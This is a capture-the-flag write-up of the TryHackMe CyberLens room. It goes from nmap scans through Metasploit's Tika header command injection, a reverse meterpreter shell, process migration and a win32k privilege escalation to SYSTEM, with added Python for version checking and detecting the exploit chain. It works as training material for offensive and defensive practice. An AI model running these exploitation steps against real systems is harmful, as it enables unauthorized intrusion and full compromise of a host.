CyberLens
Date: May 18th, 2024, Author: Anthony J. Saab
The following post by anthonyjsaab is licensed under
Link to room:
Machine version: CyberLens_v7
This writeup walks you through a room on TryHackMe created by , , and
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -T4 -p- -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 20:09 EEST
Nmap scan report for cyberlens.thm (10.10.197.190)
Host is up (0.12s latency).
Not shown: 65519 closed tcp ports (reset)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
5985/tcp open wsman
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown
49677/tcp open unknown
61777/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 335.20 seconds
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:10 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.13s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
|_http-title: CyberLens: Unveiling the Hidden Matrix
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: CYBERLENS
| NetBIOS_Domain_Name: CYBERLENS
| NetBIOS_Computer_Name: CYBERLENS
| DNS_Domain_Name: CyberLens
| DNS_Computer_Name: CyberLens
| Product_Version: 10.0.17763
|_ System_Time: 2024-05-18T18:10:14+00:00
|_ssl-date: 2024-05-18T18:10:23+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=CyberLens
| Not valid before: 2024-05-17T18:05:59
|_Not valid after: 2024-11-16T18:05:59
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
61777/tcp open http Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| http-methods:
|_ Potentially risky methods: PUT
|_http-cors: HEAD GET
|_http-title: Site doesn't have a title (text/plain).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-05-18T18:10:15
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.02 seconds
โโโ(kaliใฟkali)-[~]
โโ$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p80,135,139,445,3389,5985,47001,61777 -Pn cyberlens.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-18 21:12 EEST
Nmap scan report for cyberlens.thm (10.10.41.34)
Host is up (0.14s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.57 ((Win64))
| vulners:
| cpe:/a:apache:http_server:2.4.57:
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 0.0 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
|_ 45D138AD-BEC6-552A-91EA-8816914CA7F4 0.0 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
|_http-server-header: Apache/2.4.57 (Win64)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
61777/tcp open http Jetty 8.y.z-SNAPSHOT
|_http-server-header: Jetty(8.y.z-SNAPSHOT)
| vulners:
| cpe:/a:mortbay:jetty:8.y.z-snapshot:
|_ SSV:26121 7.8 https://vulners.com/seebug/SSV:26121 *EXPLOIT*
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.55 seconds
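Before reaching for an exploit, it is worth confirming what the Jetty instance on 61777 actually is: tika-server answers a plain GET on / with a text/plain banner naming its version (the page nmap reported as "Site doesn't have a title (text/plain)"). The Python below is an added example, not part of the original writeup; it parses such a banner and checks the version against the range affected by CVE-2018-1335 (tika-server 1.7 through 1.17). The banner string is a constructed sample in the format tika-server prints, and the live probe helper is only called if you uncomment it.

```python
import re
import urllib.request
from typing import Optional, Tuple

# Constructed sample of the text/plain page tika-server returns on "/".
SAMPLE_BANNER = (
    "This is Tika Server (Apache Tika 1.17). "
    "Please PUT or POST your data to /tika or /meta\n"
)

# CVE-2018-1335: command injection through crafted request headers sent to
# tika-server, affecting 1.7 through 1.17 (fixed in 1.18).
CVE_2018_1335_RANGE = ((1, 7, 0), (1, 17, 0))

_VERSION_RE = re.compile(r"Apache Tika (\d+)\.(\d+)(?:\.(\d+))?")


def tika_version_from_banner(banner: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from a tika-server root page, or None if absent."""
    m = _VERSION_RE.search(banner)
    if not m:
        return None
    major, minor, patch = m.group(1), m.group(2), m.group(3) or "0"
    return (int(major), int(minor), int(patch))


def affected_by_cve_2018_1335(version: Tuple[int, int, int]) -> bool:
    """Inclusive tuple comparison against the advisory's affected range."""
    lo, hi = CVE_2018_1335_RANGE
    return lo <= version <= hi


def assess_banner(banner: str) -> dict:
    """Turn a banner into a small finding: is it Tika, which version, is it in scope."""
    version = tika_version_from_banner(banner)
    if version is None:
        return {"tika": False, "version": None, "cve_2018_1335": False}
    return {
        "tika": True,
        "version": ".".join(map(str, version)),
        "cve_2018_1335": affected_by_cve_2018_1335(version),
    }


def fetch_banner(host: str, port: int, timeout: float = 5.0) -> str:
    """Live probe (needs network): GET / on the suspected tika-server."""
    with urllib.request.urlopen(f"http://{host}:{port}/", timeout=timeout) as resp:
        return resp.read().decode("utf-8", errors="replace")


if __name__ == "__main__":
    print(assess_banner(SAMPLE_BANNER))
    # Against the room's target:
    # print(assess_banner(fetch_banner("cyberlens.thm", 61777)))
```

The banner check only tells you the version is in the affected range; the Metasploit module's own check (run automatically below) is what confirms the Windows-specific injection path actually works on this host.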
The Jetty banner, the PUT method nmap flagged on 61777, and the text/plain page served at the root all point to tika-server: browsing to port 61777 returns a banner identifying Apache Tika 1.17. That puts the REST API inside the range affected by CVE-2018-1335, a command injection through crafted request headers in tika-server 1.7 through 1.17. Metasploit's apache_tika_jp2_jscript module exploits exactly that by PUTting a crafted file to /meta, so the next step is to let its check confirm the target:
┌──(kali㉿kali)-[~]
└─$ sudo msfdb init && msfconsole
[i] Database already started
[i] The database appears to be already configured, skipping initialization
Metasploit tip: You can pivot connections over sessions started with the
ssh_login modules
_---------.
.' ####### ;."
.---,. ;@ @@`; .---,..
." @@@@@'.,'@@ @@@@@',.'@@@@ ".
'-.@@@@@@@@@@@@@ @@@@@@@@@@@@@ @;
`.@@@@@@@@@@@@ @@@@@@@@@@@@@@ .'
"--'.@@@ -.@ @ ,'- .'--"
".@' ; @ @ `. ;'
|@@@@ @@@ @ .
' @@@ @@ @@ ,
`.@@@@ @@ .
',@@ @ ; _____________
( 3 C ) /|___ / Metasploit! \
;@'. __*__,." \|--- \_____________/
'(.,...."/
=[ metasploit v6.4.5-dev ]
+ -- --=[ 2413 exploits - 1242 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > search Tika
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/apache_tika_jp2_jscript 2018-04-25 excellent Yes Apache Tika Header Command Injection
1 post/linux/gather/puppet . normal No Puppet Config Gather
2 auxiliary/scanner/http/wp_gimedia_library_file_read . normal No WordPress GI-Media Library Plugin Directory Traversal Vulnerability
Interact with a module by name or index. For example info 2, use 2 or use auxiliary/scanner/http/wp_gimedia_library_file_read
msf6 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/http/apache_tika_jp2_jscript) > show options
Module options (exploit/windows/http/apache_tika_jp2_jscript):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 9998 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes The base path to the web application
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.126.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Windows
View the full module info with the info, or info -d command.
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set SRVHOST 10.11.85.12
SRVHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RHOSTS cyberlens.thm
RHOSTS => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set RPORT 61777
RPORT => 61777
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set VHOST cyberlens.thm
VHOST => cyberlens.thm
msf6 exploit(windows/http/apache_tika_jp2_jscript) > set LHOST 10.11.85.12
LHOST => 10.11.85.12
msf6 exploit(windows/http/apache_tika_jp2_jscript) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 8.10% done (7999/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 16.19% done (15998/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 24.29% done (23997/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 32.39% done (31996/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 40.48% done (39995/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 48.58% done (47994/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 56.67% done (55993/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 64.77% done (63992/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 72.87% done (71991/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 80.96% done (79990/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 89.06% done (87989/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Command Stager progress - 97.16% done (95988/98798 bytes)
[*] Sending PUT request to 10.10.41.34:61777/meta
[*] Sending stage (176198 bytes) to 10.10.41.34
[*] Command Stager progress - 100.00% done (98798/98798 bytes)
[*] Meterpreter session 1 opened (10.11.85.12:4444 -> 10.10.41.34:49786) at 2024-05-18 21:21:57 +0300
meterpreter > shell
Process 5840 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
cyberlens\cyberlens
C:\Windows\system32>dir C:\Users
dir C:\Users
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users
06/06/2023 07:48 PM <DIR> .
06/06/2023 07:48 PM <DIR> ..
03/17/2021 03:13 PM <DIR> Administrator
11/25/2023 07:31 AM <DIR> CyberLens
12/12/2018 07:45 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 14,950,584,320 bytes free
C:\Windows\system32>type C:\Users\CyberLens\Desktop\user.txt
type C:\Users\CyberLens\Desktop\user.txt
--SNIP--
meterpreter > sysinfo
Computer : CYBERLENS
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x86/windows
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System
88 4 Registry
404 4 smss.exe
500 796 svchost.exe
576 564 csrss.exe
656 644 csrss.exe
660 796 svchost.exe
676 564 wininit.exe
728 644 winlogon.exe
792 796 svchost.exe
796 676 services.exe
820 676 lsass.exe
920 796 svchost.exe
940 796 svchost.exe
960 676 fontdrvhost.exe
968 728 fontdrvhost.exe
1032 796 svchost.exe
1068 728 dwm.exe
1108 796 svchost.exe
1228 4136 conhost.exe
1264 796 svchost.exe
1280 796 svchost.exe
1288 796 svchost.exe
1296 796 svchost.exe
1372 796 svchost.exe
1380 796 svchost.exe
1388 796 svchost.exe
1396 796 svchost.exe
1428 796 svchost.exe
1476 796 svchost.exe
1496 796 msdtc.exe
1512 796 svchost.exe
1524 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
1532 796 svchost.exe
1540 796 svchost.exe
1548 796 svchost.exe
1592 796 svchost.exe
1640 796 svchost.exe
1720 796 svchost.exe
1776 796 svchost.exe
1784 796 svchost.exe
1848 796 svchost.exe
1956 796 svchost.exe
1976 796 svchost.exe
2140 796 svchost.exe
2196 796 svchost.exe
2208 796 svchost.exe
2268 796 svchost.exe
2296 4640 java.exe x64 1 CYBERLENS\CyberLens C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe
2312 796 svchost.exe
2500 796 svchost.exe
2508 796 svchost.exe
2608 796 spoolsv.exe
2628 796 svchost.exe
2636 796 svchost.exe
2664 2296 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
2672 796 svchost.exe
2724 796 svchost.exe
2732 796 svchost.exe
2740 796 svchost.exe
2772 796 svchost.exe
2780 796 svchost.exe
2844 2196 sihost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\sihost.exe
2868 796 LiteAgent.exe
2968 1592 taskhostw.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\taskhostw.exe
3012 796 svchost.exe
3028 796 svchost.exe
3084 3464 ctfmon.exe x64 1
3452 796 svchost.exe
3464 796 svchost.exe
3488 4640 httpd.exe x64 1 CYBERLENS\CyberLens C:\Apache24\bin\httpd.exe
3572 3488 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
3696 796 svchost.exe
3816 796 svchost.exe
3868 940 WmiPrvSE.exe
4004 796 svchost.exe
4024 796 svchost.exe
4040 796 svchost.exe
4060 796 svchost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\svchost.exe
4080 796 svchost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\svchost.exe
4136 1592 CompatTelRunner.exe
4180 4164 explorer.exe x64 1 CYBERLENS\CyberLens C:\Windows\explorer.exe
4380 940 ShellExperienceHost.exe x64 1 CYBERLENS\CyberLens C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe
4492 940 SearchUI.exe x64 1 CYBERLENS\CyberLens C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
4552 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
4736 940 RuntimeBroker.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\RuntimeBroker.exe
4908 796 amazon-ssm-agent.exe
4992 4908 ssm-agent-worker.exe
5000 4992 conhost.exe
5140 940 WmiPrvSE.exe
5164 5904 1GaWil.exe x86 1 CYBERLENS\CyberLens C:\Users\CYBERL~1\AppData\Local\Temp\1GaWil.exe
5176 796 svchost.exe
5180 5340 conhost.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\conhost.exe
5456 3488 httpd.exe x64 1 CYBERLENS\CyberLens C:\Apache24\bin\httpd.exe
5756 796 svchost.exe
5904 5340 cmd.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\cmd.exe
6112 1592 taskhostw.exe x64 1 CYBERLENS\CyberLens C:\Windows\System32\taskhostw.exe
meterpreter > migrate 4180
[*] Migrating from 5164 to 4180...
[*] Migration completed successfully.
meterpreter > sysinfo
Computer : CYBERLENS
OS : Windows Server 2019 (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter >
meterpreter >
Background session 2? [y/N]
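The process list above is also the defender's view of this exploit: the command stager wrote a randomly named x86 dropper into the user's Temp directory (1GaWil.exe, PID 5164), launched from cmd.exe (PID 5904) whose own parent (PID 5340) had already exited, all under the same CyberLens account that runs the Tika server's java.exe (PID 2296), and the payload then migrated into explorer.exe. The Python below is an added example, not from the writeup, that encodes that chain as two detections over constructed process-creation events in the shape of Sysmon Event ID 1 (ProcessId, ParentProcessId, Image, CommandLine). PIDs and image paths are taken from the ps listing; the command lines and the cscript.exe link between java.exe and cmd.exe are assumptions made for the example.

```python
import ntpath
from typing import Dict, List, Optional, Tuple

# Constructed sample events. PIDs/paths follow the meterpreter `ps` output; command
# lines and the cscript.exe step (PID 5340, gone by the time `ps` ran) are assumed.
EVENTS = [
    {"pid": 2296, "ppid": 4640,
     "image": r"C:\Program Files\Eclipse Adoptium\jdk-17.0.7.7-hotspot\bin\java.exe",
     "cmdline": "java -jar tika-server-1.17.jar --port 61777"},
    {"pid": 3488, "ppid": 4640, "image": r"C:\Apache24\bin\httpd.exe",
     "cmdline": "httpd.exe"},
    {"pid": 5340, "ppid": 2296, "image": r"C:\Windows\System32\cscript.exe",
     "cmdline": "cscript.exe /nologo /e:jscript stub.js"},
    {"pid": 5904, "ppid": 5340, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c %TEMP%\\1GaWil.exe"},
    {"pid": 5164, "ppid": 5904,
     "image": r"C:\Users\CYBERL~1\AppData\Local\Temp\1GaWil.exe",
     "cmdline": "1GaWil.exe"},
    {"pid": 4180, "ppid": 4164, "image": r"C:\Windows\explorer.exe",
     "cmdline": "explorer.exe"},
]

# Shells and script hosts a document-parsing service has no business spawning.
SHELLS = {"cmd.exe", "powershell.exe", "cscript.exe", "wscript.exe"}


def image_name(path: str) -> str:
    """Lower-cased file name of a Windows image path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def ancestry(events: List[Dict], pid: int) -> List[str]:
    """Image names from the given process up to the oldest recorded ancestor."""
    by_pid = {e["pid"]: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(image_name(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def hosting_java_pid(events: List[Dict], pid: int) -> Optional[int]:
    """PID of the nearest java.exe ancestor, or None if the process did not start under Java."""
    by_pid = {e["pid"]: e for e in events}
    seen = set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        if image_name(by_pid[pid]["image"]) == "java.exe":
            return pid
        pid = by_pid[pid]["ppid"]
    return None


def detect(events: List[Dict]) -> List[Tuple[str, int]]:
    """Return (rule, pid) findings for the tika-server exploitation pattern."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = image_name(e["image"])
        parent = by_pid.get(e["ppid"])
        # Rule 1: the Java process hosting tika-server spawns a shell or script host.
        if parent is not None and image_name(parent["image"]) == "java.exe" and name in SHELLS:
            findings.append(("java_spawns_shell", e["pid"]))
        # Rule 2: an executable runs out of a per-user Temp directory and the
        # process chain leads back to Java (the dropper the command stager wrote).
        if "\\appdata\\local\\temp\\" in e["image"].lower() \
                and hosting_java_pid(events, e["pid"]) is not None:
            findings.append(("temp_exec_under_java", e["pid"]))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule}: pid {pid}, chain {' <- '.join(ancestry(EVENTS, pid))}")
```

Rule 1 fires on the first hop regardless of what the injected command does; rule 2 catches the stager's artefact even if the intermediate process has exited, because it walks the recorded parent chain rather than relying on the live tree. Both would have fired before the migrate into explorer.exe hid the implant behind a legitimate process.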
msf6 exploit(windows/http/apache_tika_jp2_jscript) > use post/multi/recon/local_exploit_suggester
msf6 post(multi/recon/local_exploit_suggester) > setg SESSION 2
SESSION => 2
msf6 post(multi/recon/local_exploit_suggester) > run
[*] 10.10.108.65 - Collecting local exploits for x64/windows...
[*] 10.10.108.65 - 193 exploit checks are being tried...
[+] 10.10.108.65 - exploit/windows/local/always_install_elevated: The target is vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_dotnet_profiler: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sdclt: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/bypassuac_sluihijack: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1048_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2020_1337_printerdemon: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2021_40449: The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21882_win32k: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/cve_2022_21999_spoolfool_privesc: The target appears to be vulnerable.
[+] 10.10.108.65 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[*] Running check method for exploit 45 / 45
[*] 10.10.108.65 - Valid modules for session 2:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/always_install_elevated Yes The target is vulnerable.
2 exploit/windows/local/bypassuac_dotnet_profiler Yes The target appears to be vulnerable.
3 exploit/windows/local/bypassuac_sdclt Yes The target appears to be vulnerable.
4 exploit/windows/local/bypassuac_sluihijack Yes The target appears to be vulnerable.
5 exploit/windows/local/cve_2020_1048_printerdemon Yes The target appears to be vulnerable.
6 exploit/windows/local/cve_2020_1337_printerdemon Yes The target appears to be vulnerable.
7 exploit/windows/local/cve_2021_40449 Yes The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
8 exploit/windows/local/cve_2022_21882_win32k Yes The target appears to be vulnerable.
9 exploit/windows/local/cve_2022_21999_spoolfool_privesc Yes The target appears to be vulnerable.
10 exploit/windows/local/ms16_032_secondary_logon_handle_privesc Yes The service is running, but could not be validated.
11 exploit/windows/local/agnitum_outpost_acs No The target is not exploitable.
12 exploit/windows/local/bits_ntlm_token_impersonation No The target is not exploitable.
13 exploit/windows/local/bypassuac_eventvwr No The target is not exploitable.
14 exploit/windows/local/bypassuac_fodhelper No The target is not exploitable.
15 exploit/windows/local/canon_driver_privesc No The target is not exploitable. No Canon TR150 driver directory found
16 exploit/windows/local/capcom_sys_exec No Cannot reliably check exploitability.
17 exploit/windows/local/cve_2019_1458_wizardopium No The target is not exploitable.
18 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
19 exploit/windows/local/cve_2020_0796_smbghost No The target is not exploitable.
20 exploit/windows/local/cve_2020_1054_drawiconex_lpe No The target is not exploitable. No target for win32k.sys version 10.0.17763.557
21 exploit/windows/local/cve_2020_1313_system_orchestrator No The target is not exploitable.
22 exploit/windows/local/cve_2020_17136 No The target is not exploitable. The build number of the target machine does not appear to be a vulnerable version!
23 exploit/windows/local/cve_2021_21551_dbutil_memmove No The target is not exploitable.
24 exploit/windows/local/cve_2022_3699_lenovo_diagnostics_driver No The target is not exploitable.
25 exploit/windows/local/cve_2023_21768_afd_lpe No The target is not exploitable. The exploit only supports Windows 11 22H2
26 exploit/windows/local/cve_2023_28252_clfs_driver No The target is not exploitable.
27 exploit/windows/local/gog_galaxyclientservice_privesc No The target is not exploitable. Galaxy Client Service not found
28 exploit/windows/local/ikeext_service No The check raised an exception.
29 exploit/windows/local/lexmark_driver_privesc No The target is not exploitable. No Lexmark print drivers in the driver store
30 exploit/windows/local/ms10_092_schelevator No The target is not exploitable. Windows Server 2019 (10.0 Build 17763). is not vulnerable
31 exploit/windows/local/ms14_058_track_popup_menu No Cannot reliably check exploitability.
32 exploit/windows/local/ms15_051_client_copy_image No The target is not exploitable.
33 exploit/windows/local/ms15_078_atmfd_bof No Cannot reliably check exploitability.
34 exploit/windows/local/ms16_014_wmi_recv_notif No The target is not exploitable.
35 exploit/windows/local/ms16_075_reflection No The target is not exploitable.
36 exploit/windows/local/ms16_075_reflection_juicy No The target is not exploitable.
37 exploit/windows/local/ntapphelpcachecontrol No The check raised an exception.
38 exploit/windows/local/nvidia_nvsvc No The check raised an exception.
39 exploit/windows/local/panda_psevents No The target is not exploitable.
40 exploit/windows/local/ricoh_driver_privesc No The target is not exploitable. No Ricoh driver directory found
41 exploit/windows/local/srclient_dll_hijacking No The target is not exploitable. Target is not Windows Server 2012.
42 exploit/windows/local/tokenmagic No The target is not exploitable.
43 exploit/windows/local/virtual_box_opengl_escape No The target is not exploitable.
44 exploit/windows/local/webexec No The check raised an exception.
45 exploit/windows/local/win_error_cve_2023_36874 No The target is not exploitable.
[*] Post module execution completed
msf6 post(multi/recon/local_exploit_suggester) >
Of these, #7 (exploit/windows/local/cve_2021_40449) looks the most promising: it is a win32k kernel elevation-of-privilege bug whose check positively matched this build (17763 is Windows 10 v1809 / Server 2019), it needs no MSI to be dropped the way #1 (AlwaysInstallElevated) does, and unlike the UAC bypasses (#2 to #4) it does not depend on the current user already being a local administrator.
msf6 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/cve_2021_40449
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/cve_2021_40449) > run
[*] Started reverse TCP handler on 10.11.85.12:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Vulnerable Windows 10 v1809 build detected!
[*] Launching netsh to host the DLL...
[+] Process 5340 launched.
[*] Reflectively injecting the DLL into 5340...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (201798 bytes) to 10.10.108.65
[*] Meterpreter session 3 opened (10.11.85.12:4444 -> 10.10.108.65:49810) at 2024-05-19 11:02:02 +0300
meterpreter > shell
Process 5372 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.1821]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>cd C:\
cd C:\
C:\>dir /s admin.txt
dir /s admin.txt
Volume in drive C has no label.
Volume Serial Number is A8A4-C362
Directory of C:\Users\Administrator\Desktop
11/27/2023 07:50 PM 24 admin.txt
1 File(s) 24 bytes